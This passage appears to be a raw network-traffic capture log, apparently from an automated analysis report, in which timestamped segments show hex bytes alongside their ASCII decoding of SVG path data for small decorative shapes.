                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4899INData Raw: 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 36 33 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64
                                                                                                                                                                                                                                                        Data Ascii: 2.36,2.36,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.63,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4915INData Raw: 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c
                                                                                                                                                                                                                                                        Data Ascii: 1a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4931INData Raw: 35 2c 32 33 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                        Data Ascii: 5,237a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4947INData Raw: 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                        Data Ascii: 71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class=
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4963INData Raw: 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 37 38 2c 31 36 35 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35
                                                                                                                                                                                                                                                        Data Ascii: 2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M557.78,165.66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M5
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4979INData Raw: 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 37 35 2c 32 34 31 2e 37 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c
                                                                                                                                                                                                                                                        Data Ascii: .22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M591.75,241.76a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4995INData Raw: 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 35 37 2c 31 30 32 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: 8"/><path class="cls-7" d="M610.57,102.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5011INData Raw: 38 2e 31 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                        Data Ascii: 8.17a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5027INData Raw: 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                        Data Ascii: .87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5043INData Raw: 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 37 2e 30 37 2c 31 30 36 2e 38 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c
                                                                                                                                                                                                                                                        Data Ascii: 7,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M697.07,106.87a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5059INData Raw: 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 31 2c 31 38 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c
                                                                                                                                                                                                                                                        Data Ascii: .36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M731,183a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5075INData Raw: 36 35 2c 32 35 39 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35
                                                                                                                                                                                                                                                        Data Ascii: 65,259.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.5
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5091INData Raw: 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 33 34 2c 32 36 38 2e 32 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.34,268.22a2.16,2.16,0,0,1-1.09,2.75,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5107INData Raw: 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 30 38 2c 33 32 39 2e 32 39 41 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2c 36 38 37 2c 33 33 32 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34
                                                                                                                                                                                                                                                        Data Ascii: 2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M688.08,329.29A2.16,2.16,0,0,1,687,332a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5123INData Raw: 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 31 2c 33 39 30 2e 33 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35
                                                                                                                                                                                                                                                        Data Ascii: 1,0,3.58"/><path class="cls-9" d="M722.81,390.36a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5139INData Raw: 39 22 20 64 3d 22 4d 37 35 37 2e 35 35 2c 34 35 31 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: 9" d="M757.55,451.44a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5155INData Raw: 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36
                                                                                                                                                                                                                                                        Data Ascii: 2,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.6
